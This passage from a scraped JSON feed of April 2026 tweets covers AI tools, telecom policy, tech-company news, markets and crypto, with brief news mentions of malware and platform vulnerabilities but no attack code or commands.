"https://x.com/cursor_ai/status/2049901436918436249", + "published_at": "2026-04-30T17:19:22+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "GPT-5.5的网络攻击能力好像比前段时间吹上天的Mythos\n\n没差这么多呀😂", + "url": "https://x.com/lxfater/status/2049896961382203667", + "published_at": "2026-04-30T17:01:35+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下不止中国大陆,连香港到美的互联也要玩烂了!\nFCC表决撤销中资运营商的一揽子授权之提议,目的是堵住 2022 年的法律漏洞:即使「中资运营商」的通信牌照被撤销,它们仍可根据一揽子授权(Blanket Authority)自动获得美国国内的州际电信服务资质\n\n会议中最激进的部分是关于禁止互联(Interconnection)的讨论,即讨论将从物理上禁止Verizon、AT&T等美资运营商与中资运营商的互联。如此一来,不仅电信、联通、移动、中信的美国电信业务被踢出局,还会连带IDC、IXP、PoP一同被赶这次行动会祭出「股权穿透」大招,即电信、联通、移动、中信的本体及其占股 >= 10% 的关联公司,都会因此连坐\n\n其中香港运营商PCCW和HKT都满足「股权穿透」条件,大概还有30-60天的公开征求意见期,以及可能的上诉法院司法审查。三大运营商+中信的游说团和律师团虽说要出动,但翻盘的成功率很低,因为但凡涉及national security这种包装话术,即使走到美国上诉法院,都免不了支持 FCC 提案,这毕竟符合美版《总体国家安全观》", + "url": "https://x.com/realNyarime/status/2049896651989614721", + "published_at": "2026-04-30T17:00:21+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "OpenAI 发了篇博客复盘自家模型一个挺有意思的\"口癖哥布林\"问题,\n\n从 GPT-5.1 起,他们的模型莫名其妙开始爱用 goblin、gremlin 这些怪物词打比方,越往后越泛滥。\n\nOpenAI 一路扒数据,定位到是训练 \"Nerdy\"(书呆子气)人格时,奖励信号意外地给\"用怪物词做比喻\"加了高分。\n\n具体证据:\n1. GPT-5.1 上线后,ChatGPT 里 goblin 用量涨了 175%,gremlin 涨了 52%。\n\n2. Nerdy 人格只占所有回答的 2.5%,却贡献了 66.7% 的 goblin。76.2% 的数据集里,带怪物词的回答评分都比不带的高。\n\n3. RL 不保证学到的行为只待在原始条件里。Nerdy 下生成的样本被复用进 SFT(监督微调),整个模型就跟着学过去了。\n\n4. 还不止 goblin 一族——raccoon(浣熊)、troll、ogre、pigeon 全中招,frog 倒是大部分时候是合理使用。\n\n5. OpenAI 三月退役了 Nerdy 人格、删掉这条奖励、过滤了训练数据里的怪物词。GPT-5.5 没赶上修,就在 Codex 里加了一句\"别说 goblin\"的 system prompt 兜底。", + "url": "https://x.com/Pluvio9yte/status/2049890985631768653", + "published_at": "2026-04-30T16:37:50+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "N26关门了,中港澳台全部不接受", + "url": "https://x.com/realNyarime/status/2049889887684616218", + "published_at": "2026-04-30T16:33:28+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "👀回顾来时路\n\n从这条推文开始,进行了9个月的日更推文\n\n经历了内容方向的摸索、带人X增长与知识付费和自身X增长矛盾的时期、B端业务探索\n\n算是找到了点出路\n\n离职的可以参考下,在职的也要掂量下", + "url": "https://x.com/GoSailGlobal/status/2049887802863583240", + "published_at": "2026-04-30T16:25:11+00:00", + "source": "nitter" + }, + { + "handle": "AndrewYNg", + "account": "@AndrewYNg", + "name": "Andrew Ng", + "title": "Pinned: How we prompt AI is very different in 2026 than 2022 when ChatGPT came out.\n\nI'm teaching a new course, AI Prompting for Everyone, to help you become an AI power user — whatever your current skill level.\n\nIt covers skills that apply across ChatGPT, Gemini, Claude, and other AI tools. How to use deep research mode for well-researched reports on complex questions. How to give AI the right context, including more documents and images than most people realize you can provide. When to ask AI to think hard for several minutes on important decisions like what car to buy, what to study, or what job to take. And how to use AI to generate images, analyze data, and build simple games and websites.\n\nI also cover intuitions about how these models work under the hood, so you know when to trust an answer and when not to.\n\nAlong the way, you'll see flying squirrels, a creativity test, some of my old family photos, and fireworks.\n\nJoin me at http://deeplearning.ai/courses/ai-prompting-for-everyone", + "url": "https://x.com/AndrewYNg/status/2049886895530967534", + "published_at": "2026-04-30T16:21:35+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "A÷你认真的吗,38分钟打满了😅", + "url": "https://x.com/Pluvio9yte/status/2049886136580137378", + "published_at": "2026-04-30T16:18:34+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Microsoft Revenues (Billions)...\n2026 (est): 354\n'25: 305\n'24: 262\n'23: 228\n'22: 203\n'21: 185\n'20: 153\n'19: 134\n'18: 118\n'17: 102\n'16: 95\n'15: 88\n'14: 93\n'13: 83\n'12: 73\n'11: 72\n'10: 67\n'09: 59\n'08: 62\n'07: 58\n'06: 46\n'05: 41\n'04: 38\n'03: 34\n'02: 31\n'01: 27\n'00: 24\n'99: 22\n$MSFT", + "url": "https://x.com/charliebilello/status/2049882175433015544", + "published_at": "2026-04-30T16:02:50+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Naval 讲了一句让我转身就去打开 Cursor 的话\n\n电子游戏给你的是假奖励真多巴胺 \n\nvibe coding 给你的是真奖励真多巴胺\n\n游戏让你卡在能力边缘,但世界是别人造的,迟早通关 \n\nvibe coding 底下跑的是图灵机,无界,目标自己定,做出来的东西是真的\n\n他一批朋友因此\"消失了\",钻进去做自己想了很多年的那个 app \n\n他自己也在一个人重做 Airchat\n\n而最难的不是写代码,是知道你要什么", + "url": "https://x.com/GoSailGlobal/status/2049881966850499058", + "published_at": "2026-04-30T16:02:00+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "Mitchell(Vagrant、Terraform、Ghosty 的作者)今天宣布离开 GitHub \n\nGitHub 第 1299 号用户,注册 18 年,几乎没断过一天 \n\n他说写完离别帖,眼泪滴到了键盘上\n\n不是矫情,是 GitHub 真的快不能用了\n\n最近两周连续翻车 \n\n1️⃣ 4 月 23 日 merge queue 出 bug,2800 多个 PR 被静默撤回,已经合进主干的代码凭空消失 \n\n2️⃣ 拉取请求 API 整整一个工作日打不开 \n\n3️⃣ 一个 RCE 漏洞,黑客一个 git push -O 就能访问上百万仓库 TanStack 包名被恶意抢注,NPM 拖了几年没处理,那个抢注包昨天被植入恶意代码,专偷 .env\n\n技术平台的信任有 4 层 \n(1)功能跟昨天一致吗 - 早就在崩 \n(2)现在能用吗 - 一半时间不能 \n(3)昨天合并的代码还在吗 - 这条线最近被跨过去了 \n(4)别人能偷走我的代码吗 - 这条也跨了 \n\nGitHub 一层一层全丢了\n\n最荒诞的部分在管理层 GitHub 现在没有 CEO \n\nCOO 和 CTO 直接向一个微软 Azure/AI 副总汇报 \n\n而那个副总,恰好是 Atlassian 董事会成员 (Atlassian 名下那个产品叫 Bitbucket)\n\n有没有更好的替代品,是这一个真的不能用了\n\nGitLab?Forgejo?Codeberg ?Bitbucket?", + "url": "https://x.com/GoSailGlobal/status/2049881037547999546", + "published_at": "2026-04-30T15:58:18+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Google Revenues (Billions)...\n2026 (est): 476\n2025: 403\n2024: 350\n2023: 307\n2022: 283\n2021: 258\n2020: 183\n2019: 162\n2018: 137\n2017: 111\n2016: 90\n2015: 75\n2014: 66\n2013: 56\n2012: 46\n2011: 38\n2010: 29\n2009: 24\n2008: 22\n2007: 17\n2006: 11\n2005: 6.1\n2004: 3.2\n$GOOGL", + "url": "https://x.com/charliebilello/status/2049880154629878151", + "published_at": "2026-04-30T15:54:48+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "The future of product design.", + "url": "https://x.com/dingyi/status/2049875727689146789", + "published_at": "2026-04-30T15:37:12+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "所以GPT的Plus和Team额度差多少", + "url": "https://x.com/realNyarime/status/2049874226778452072", + "published_at": "2026-04-30T15:31:15+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "ChatGPT 还在让你复制粘贴的时候,Gemini 已经把活儿干完了 \n\n昨天 Google 悄悄上线了一个功能:在对话框里直接生成文件,你让他帮你写一份 budget,它是真的给你导出 \n\nExcel 支持的格式一口气拉满: PDF / Word / Excel Google Docs / Sheets / Slides LaTeX / CSV / TXT / RTF / Markdown \n\n操作只有两步: \n1)跟它说「帮我做一份 XX」 \n2)点导出 → 下载到本地或同步进 Drive \n\n意味着什么? \n\n普通用户从「问 AI」到「拿到成品」的距离,第一次被压进一个对话框里\n\n办公 AI 的最后一公里,被 Google 先抢了 全球免费已开,做出海 / AI 工具号 / 跨境内容的,下一波选题素材又有了 \n\n正在追这条线的更多动向,下一条接着拆怎么用", + "url": "https://x.com/GoSailGlobal/status/2049872749850665004", + "published_at": "2026-04-30T15:25:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "R to @CuiMao: 本视频由seedance2生成,切勿当真!", + "url": "https://x.com/CuiMao/status/2049863222195572817", + "published_at": "2026-04-30T14:47:31+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "x.com/i/article/204974126036…", + "url": "https://x.com/GoSailGlobal/status/2049862449474740224", + "published_at": "2026-04-30T14:44:27+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "R to @realNyarime: 4月29日,据广州市天河区投资服务中心官方公众号“投资天河”发布消息,科技巨头谷歌已于28日正式签订合同,入驻位于天河CBD珠江新城的城市地标广州国际金融中心(西塔),将率先落地跨境数智赋能服务创新项目,预计今年第三季度正式投入运营。谷歌方面将联合各方优势资源,推出多项创新科技服务。\n\n据了解,谷歌将在广州天河整合全球领先的科技资源,为内地跨境电商企业提供近距离的海外精准营销、国际化品牌打造、数字化技术赋能、全球流量对接等全链条服务,谷歌依托其在全球领先的科技实力,不仅可帮助企业降低出海成本、提升运营效率,推动“中国制造”加速向“中国品牌”转型,更将在广州国际级CBD核心区——珠江新城加速一批跨境数智服务企业集聚,形成新的出海生态。", + "url": "https://x.com/realNyarime/status/2049857210659070441", + "published_at": "2026-04-30T14:23:38+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "据羊城晚报报道,谷歌落地广州,入驻位于天河 CBD 珠江新城地标广州国际金融中心(西塔)\n\n将率先落地跨境数智赋能服务创新项目,主打跨境电商业务,预计今年 Q3 正式投入运营\n谷歌方面将联合各方优势资源,推出多项国内首创科技服务", + "url": "https://x.com/realNyarime/status/2049856990957236483", + "published_at": "2026-04-30T14:22:45+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK\nYoutube: https://youtu.be/aXToQKc430c\nApple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raises-%2445bn-but-falls-short-on-compute/id958230465?i=1000764648424", + "url": "https://x.com/HarryStebbings/status/2049852141334904978", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference.\n\n- Anthropic Raises $45BN but Falls Short on Compute\n- Are OpenAI Back in the Game with GPT5.5 & Codex?\n- Why Google is a Bigger Buy Than Ever Before\n- China Blocks Manus $2BN Deal to Meta\n- Thoma Bravo Hand Back Medallia Keys to Creditor\n\nI sat down with @rodriscoll and @jasonlk and my notes below:\n\n1. Why does Dario at Anthropic have such a hard job predicting the compute demands?\n\nThe capital intensity of building an AI leader is unprecedented; every $1 of run-rate revenue requires approximately $4 to $5 of CapEx to support it. A CEO must forecast demand two years in advance, which is incredibly risky. Underestimating demand leaves you with insufficient compute to serve users, while overestimating it results in billions of dollars in \"stranded capacity\".\n\n2. What the public markets are getting wrong about the SaaS-pocalypse\n\nThe market currently believes specific coding vibes or models are the primary threat, but the true danger is what AI agents decide to pick. Agents will ultimately choose the vendors and LLMs for most workflows, rendering tools like project management software useless because agents have no need for them. Companies like OpenAI are racing to win the \"agent wars\" to ensure their APIs are the default choice for these autonomous systems.\n\n3. Why Google is a mega-buy on the back of the Anthropic investment\n\nGoogle is positioned as a primary winner because it benefits whether users choose Gemini or Anthropic. They possess \"infinite capacity\" compared to other players, allowing them to route compute surplus between their own needs and their various customers. This massive cash flow and infrastructure flexibility make them a \"win-win-win\" in the current AI arms race.\n\n4. Multi-year contracts don't matter. Deferred churn is still churn.\n\nMulti-year contracts are often a place where \"mediocre\" management hides to mask underlying business problems. While a customer might be locked into an eight-year cycle through standard upfront terms and renewals, they are essentially just taking that time to find a better enterprise solution. If a customer eventually leaves, the churn was merely deferred, and the terminal value of the company remains impacted.\n\n5. What happens to the distributions from Manus? Do the investors have to give the money back?\n\nWhen a regulatory body like China attempts to \"unwind\" an acquisition like Meta's purchase of Manus, there is a near-zero chance that venture investors will return the capital already distributed. The real pressure point is on the acquiring corporation and the technology itself, rather than the VC funds. Such rulings are primarily designed to prevent similar deals from occurring in the future.\n\n6. The two great wars that no one is talking about\n\nTwo subtle but massive \"battles\" are currently unfolding: the US vs. China AI war and the resulting social dislocation. We are seeing a rise in \"social unrest\" expressed through billionaire taxes and penthouses taxes as layoffs from AI automation begin to impact the workforce. These themes of geopolitical competition and internal inequality will be the defining political stories of the decade.\n\n(links below)", + "url": "https://x.com/HarryStebbings/status/2049852139690754293", + "published_at": "2026-04-30T14:03:29+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "补充一点我的经历:先拿到第一单,然后作为脱敏案例,后续拿下新客户也会更容易。", + "url": "https://x.com/Pluvio9yte/status/2049845097924342258", + "published_at": "2026-04-30T13:35:30+00:00", + "source": "nitter" + }, + { + "handle": "GoSailGlobal", + "account": "@GoSailGlobal", + "name": "Jason Zhu", + "title": "RT by @GoSailGlobal: x.com/i/article/204984109084…", + "url": "https://x.com/GoSailGlobal/status/2049842340056174762", + "published_at": "2026-04-30T13:24:32+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Manias, Panics, and All-Time Highs (The Week in Charts)...", + "url": "https://x.com/charliebilello/status/2049842225970852313", + "published_at": "2026-04-30T13:24:05+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "这下压力给到CAAC了,\n不过当年不予公开的原因是,可能危及国家安全、社会稳定😣", + "url": "https://x.com/realNyarime/status/2049839485610029262", + "published_at": "2026-04-30T13:13:12+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: The Fed's preferred measure of inflation (Core PCE) came in at 3.2% in March, the highest level since November 2023. This was the 61st consecutive reading above the Fed's 2% target level. There will be no Fed rate cut in June and one could make a strong case for a rate hike.", + "url": "https://x.com/charliebilello/status/2049838235866566668", + "published_at": "2026-04-30T13:08:14+00:00", + "source": "nitter" + }, + { + "handle": "charliebilello", + "account": "@charliebilello", + "name": "Charlie Bilello", + "title": "RT by @charliebilello: Gas prices in the US have moved up to $4.30 per gallon, their highest level since July 2022. The 44% spike over the last 9 weeks ($2.98/gallon to $4.30/gallon) is the biggest we've seen in the past 30 years.", + "url": "https://x.com/charliebilello/status/2049836652181307421", + "published_at": "2026-04-30T13:01:56+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这篇文章说了很多小团队的协作经验\n\n文里提到的一些模式我也深有体会。\n\n曾经我也在工作之余兼职创业团队,也是toB,先打磨4个月,然后3个月赚了接近300万。\n\n最后也是因为超预期在分钱上出了问题。\n\n不过我没题主这么幸运,最后我一气之下离开了团队。如果在一开始就决定深入合作,找个律师过一眼合同还是挺重要的,这是我受到的教训。", + "url": "https://x.com/Pluvio9yte/status/2049836555171512759", + "published_at": "2026-04-30T13:01:33+00:00", + "source": "nitter" + }, + { + "handle": "0xAA_Science", + "account": "@0xAA_Science", + "name": "0xAA", + "title": "孜然牛肉盖饭 4u", + "url": "https://x.com/0xAA_Science/status/2049832988452778343", + "published_at": "2026-04-30T12:47:23+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "有没有深圳的,我准备搬到深圳住,有什么需要注意的和推荐的,求告知。", + "url": "https://x.com/CuiMao/status/2049832524067794961", + "published_at": "2026-04-30T12:45:32+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "88code以前也是L站的富可敌国之一,后面因为N佬(另一位富可敌国)的PrivNode以10元出售66万债务影响,一直都没退款\n主体是北京灵伊智能科技有限公司,本质上是AI中转站,去年年底就有多名佬友反应高峰不可用、故障率高等问题,特别是挂了没有通知\n\n借雪踏乌云佬的帖提一嘴,采买第三方API服务应当多留意一下,避开这类有前科的AI中转站以免造成不必要的经济损失", + "url": "https://x.com/realNyarime/status/2049831528109326356", + "published_at": "2026-04-30T12:41:34+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "老板,我们私底下做中转站的勾当彻底被曝光了 @DarioAmodei", + "url": "https://x.com/CuiMao/status/2049828401201246395", + "published_at": "2026-04-30T12:29:09+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silently rewrote floating-point calculations to make them produce slightly wrong answers. Targets: high-precision engineering suites used for structural analysis, crash simulations, and physical process modeling, including LS-DYNA, a tool cited in reports on Iran's nuclear weapons research. The sabotage vector relied on deployment of the driver across a network via worm, corrupting calculations on every machine, and eliminating the possibility of cross-checking results against a clean system. Stuxnet got the documentary. Fast16 got twenty years of nothing. https://www.sentinelone.com/labs/fast16-mystery-shadowbrokers-reference-reveals-high-precision-software-sabotage-5-years-before-stuxnet/", + "url": "https://x.com/paulg/status/2049822204599087472", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "这是我学习web3的一点点经验,目前刚接触不久,每一次学习和经验记录都会隔段时间记录下来,发一篇文章。\n\n既是记录经验也是总结经验教训,欢迎各位一起围观下我的web3交易学习路径。", + "url": "https://x.com/Pluvio9yte/status/2049822206885286318", + "published_at": "2026-04-30T12:04:32+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "x.com/i/article/204977806829…", + "url": "https://x.com/Pluvio9yte/status/2049821305072124254", + "published_at": "2026-04-30T12:00:57+00:00", + "source": "nitter" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Crypto's current state is a bit shit\n\n1. Market cap is not an indicator of quality - the top 50 is made up of ghost coins or bloated governance slop that has underperformed and is uninvestable \n\n2. The long tail speculative stuff went from high risk high reward to 'some dude in Miami is going to zero this if you hold it for more than 5.9 seconds'\n\n3. Everything is extremely correlated and you can't meaningfully make bets based on sectors as it all converges into a tightly correlated mush, especially to the downside\n\n4. Broad brush alt season is an artefact of the past that's very hard to replicate given (2) and given that there are simply too many coins and the excess of speculation doesn't really happen on centralised exchanges anymore - it's been siphoned off to bundled shit in max PvP settings\n\n5. Crypto reputationally is no longer the sexy frontier of speculation. Institutional bid is in AI, retail speculative bid is in 0DTE equities, single name stocks etc.\n\n6. Convexity has flattened. Even a lot of the historically safe blue chip stuff (BTC, ETH etc.) has underperformed and the historical anchor of 'buy deep drawdowns because all-time highs are guaranteed and explosive' has disappointed. All the shit we used to put up with because of the accessibly massive trend and momentum effects is now harder to justify because those same effects are getting neutered or siphoned off into other arenas.\n\nThe obvious rebuttal is 'cycles' but even this past cycle is a useful counterpoint: it was extremely concentrated versus broad brush wealth effect, plus something very obviously broke after 10/10.\n\nSo what does this all mean?\n\n1. In previous cycles, nailing timing was enough and selection was the cherry on top (rising tide lifted all boats). I don't think that holds - both timing and selection matter now and in the future.\n\n2. Participation alone can be an edge if the asset class is early enough and/or mispriced enough. I don't think that holds either, and we might actually have to learn how to trade (fuck).\n\n3. Hopefully I'm an idiot doomposting the bottom\n\nGM", + "url": "https://x.com/CryptoCred/status/2049820412754694460", + "published_at": "2026-04-30T11:57:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "R to @runes_leo: github.com/runesleo/claude-v…", + "url": "https://x.com/runes_leo/status/2049811948653752753", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "开源视频管线 claude-video-kit 升级\n\n比上一版多了:\n\n· 加了一个真实跑通的示例(就是上面这条视频的 script.json,10 个 slide / 46 秒,clone 完改改字段就能跑自己的)\n· Remotion / ffmpeg 版本锁定 + 音频标准化配方\n· 声纹 ref 改环境变量\n· v0.2 视觉路线图(双语小标签 / 双色高亮 / emoji 数据卡 / 双卡片对比)\n\n仓库链接见评论区👇", + "url": "https://x.com/runes_leo/status/2049811945528893682", + "published_at": "2026-04-30T11:23:46+00:00", + "source": "nitter" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: ✨🧠 Tribe v2, our latest model of human brain responses to sound, sight and language can now be (partly) explored on your phone📱:\n\n▶️demo: https://aidemos.atmeta.com/tribev2/ \n📄paper: https://ai.meta.com/research/publications/a-foundation-model-of-vision-audition-and-language-for-in-silico-neuroscience/\n💻code: https://github.com/facebookresearch/tribev2", + "url": "https://x.com/ylecun/status/2049806660001022372", + "published_at": "2026-04-30T11:02:45+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "Claude code 对 OpenClaw的封杀已经丧心病狂了\n\n最近,Theo(32 万粉的硅谷科技 YouTuber) 发现:\n\n如果你最近的提交中有一个 JSON 文件提到了OpenClaw,Claude Code 要么会拒绝你的请求,要么会额外收费\n\n现在Anthropic已经疯狂在毁开发者好感了\n\n这种表里不一不是第一次了哈\n\n之前 Claude Code 负责人 Boris Cherny,在推特上公开承诺过:CLI 调用是不会被封了\n\nOpenClaw 作者 Steinberger 信了,还专门给 OpenClaw 改了默认配置\n\n现在他还在HK抱怨:Anthropic 后台还在封 OpenClaw 的 system prompt。\n\n真的是朴实无华的商战!!", + "url": "https://x.com/lxfater/status/2049796253471453564", + "published_at": "2026-04-30T10:21:24+00:00", + "source": "nitter" + }, + { + "handle": "runes_leo", + "account": "@runes_leo", + "name": "Leo", + "title": "Warp 开源那天我没换。\n\n为啥?看了眼 license 直接乐了。\n\nrepo 是 2021 年 7 月就建了,闭源跑了快 5 年,4/28 突然开源——但选的不是 MIT 也不是 Apache,是 AGPL-3.0。\n\nAGPL 就是那个专门防 AWS 白嫖的协议。\n\n你想啊,开源数据库选 MIT,AWS 直接拿去包成 RDS 赚几十亿,你一分钱看不到。选 AGPL,AWS 必须把改动也吐出来——AWS 一般就放弃了。\n\nMongoDB 当年觉得 AGPL 还不够狠,自己发明了更绝的 SSPL。结果 AWS 干脆绕开 MongoDB 自己 fork 一个改名 DocumentDB。但 MongoDB 守住了自己的市场。\n\nWarp 这次抄的就是这套作业。\n\n更骚的是 OpenAI 掺一脚做 founding sponsor,README 写得明白,\"agentic workflows powered by GPT models\"。\n\n合起来啥意思?\n\nWarp 把\"终端\"这层免费送,让所有人习惯在终端里调 AI。AGPL 防住大厂二次包装。OpenAI 在更上游收 API 的钱。顺手把 Cursor 那种\"卖 $20/月 AI 编辑器订阅\"的活路一并端了——免费给你 AI 终端 + GPT 模型,凭啥继续付 Cursor?\n\n闭源真的卖不动了。开源是逼出来的。\n\n---\n\nAI dev tool 现在四种活法:\n\n- Cursor:闭源卖订阅,VC 续命,Warp 这种免费替代品出来后越来越难\n- Claude Code:闭源,但钱不在终端层,在 Anthropic API 层收\n- Warp:开源 + AGPL 防御,让 OpenAI 出钱\n- Aider:Apache 真开源,比 Cursor 早 2 年的开源 AI pair programming CLI,一个开发者维护,没商业野心\n\n共同信号一句话:纯卖软件订阅在这层快走死了。\n\n---\n\n我自己用 Ghostty + Claude Code / Codex。\n\n终端只做终端,AI 在 agent 层。\n\nWarp 把两件事捏一起,对我冗余。它解决的痛点我没有。", + "url": "https://x.com/runes_leo/status/2049791371364479224", + "published_at": "2026-04-30T10:02:00+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "View of Stockholm.", + "url": "https://x.com/paulg/status/2049788518730240192", + "published_at": "2026-04-30T09:50:40+00:00", + "source": "nitter" + }, + { + "handle": "dingyi", + "account": "@dingyi", + "name": "Ding", + "title": "最近刷推,像是逛街,中转站一条街。。。全是自卖自夸吆喝的。(无恶意就是描述一种景象", + "url": "https://x.com/dingyi/status/2049787450290287014", + "published_at": "2026-04-30T09:46:26+00:00", + "source": "nitter" + }, + { + "handle": "Pluvio9yte", + "account": "@Pluvio9yte", + "name": "雪踏乌云", + "title": "欢迎大家来参加由http://dragoncode.codes举办的小黑客松\n\nDragonCode是我和泊舟@bozhou_ai一起建立的Claude&Codex中转站,稳定运营了一段时间,也决定发起一些有意思的活动!\n\n主题不难,围绕能够提效的小工具Vibe Coding即可\n\n奖励:\n🥇510元x1\n🥈150元x2\n🎁51 Dragon Code x15\n\n参与方式见引用帖子:进群->填表>提交作品", + "url": "https://x.com/Pluvio9yte/status/2049786034502967620", + "published_at": "2026-04-30T09:40:48+00:00", + "source": "nitter" + }, + { + "handle": "lxfater", + "account": "@lxfater", + "name": "铁锤人", + "title": "说一下我是如何用AI工具的:\n\nXai的Gork的搜索能力很强的,我经常使用来做搜索。\n\nCluade Desktop帮我填写表单,报税,偶尔做做知识库。Claude Code主要拿来走写点文字。\n\n而Codex GPT-5.5 xhigh fast 才是你编程的最佳选择。", + "url": "https://x.com/lxfater/status/2049782414323388714", + "published_at": "2026-04-30T09:26:25+00:00", + "source": "nitter" + }, + { + "handle": "CuiMao", + "account": "@CuiMao", + "name": "CuiMao", + "title": "你这个朋友我认识", + "url": "https://x.com/CuiMao/status/2049778271714496808", + "published_at": "2026-04-30T09:09:57+00:00", + "source": "nitter" + }, + { + "handle": "paulg", + "account": "@paulg", + "name": "Paul Graham", + "title": "RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. \n\nThe job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the running. \n\nTack. Ha det fint! 🇸🇪", + "url": "https://x.com/paulg/status/2049771206283313434", + "published_at": "2026-04-30T08:41:53+00:00", + "source": "nitter" + }, + { + "handle": "bozhou_ai", + "account": "@bozhou_ai", + "name": "泊舟", + "title": "Pinned: 五一做点不一样的。\n\n我和乌云 @Pluvio9yte 搞了一个小型 AI 黑客松👇\n\n主题很简单:\n用 AI 解决一个每天浪费 10 分钟的小问题\n\n不用炫技,不用大项目\n能用、有效、有感觉就行\n\n3 个赛道:\n\n赛道一:省时间\n把重复劳动自动化,比如:日报生成、聊天记录转待办、会议纪要整理、消息摘要、资料归类。\n\n赛道二:省脑力\n帮人理解和决策,比如:PDF 问答、信息摘要、内容对比、评论分析、知识整理。\n\n赛道三:帮身边人\n解决具体生活或工作问题,比如:说明书问答、账单整理、小商家工具、旅行助手、宠物照护提醒。\n\n时间:\n提交时间:4月30日 - 5月4日\n评审时间:5月5日\n结果公布:5月5日\n\n奖励:\n\n🥇 510 元 ×1\n🥈 150 元 ×2\n🎁 51 Dragon Code ×15\n\n要求很低:\n\n有 Demo(哪怕只是个能跑的)\n用了 AI(生成 / 摘要 / Agent 都行)\n能说明前后变化(比如省了多少时间)\n\n评分看这 5 点:\n\n痛点是否真实\n效果是否明显\nDemo 是否跑通\nAI 用得对不对\n有没有产品感\n\n参与方式:\n\n进群 → 填表 → 提交作品\n\n一句话:\n\n做一个你自己都想每天用的小工具", + "url": "https://x.com/bozhou_ai/status/2049770737175789619", + "published_at": "2026-04-30T08:40:01+00:00", + "source": "nitter" + }, + { + "handle": "realNyarime", + "account": "@realNyarime", + "name": "奶昔", + "title": "下载NVIDIA App,领取《鸣潮》游戏礼包\n\n包含游戏道具:高级能源核心 x 2、高级能量袋 x 1、贝币 x 20000。\n\n数量有限,兑完即止。(本活动仅适用于中国大陆用户)\n本活动将于 2026 年 6 月 10 日结束。", + "url": "https://x.com/realNyarime/status/2049765382433755229", + "published_at": "2026-04-30T08:18:44+00:00", + "source": "nitter" 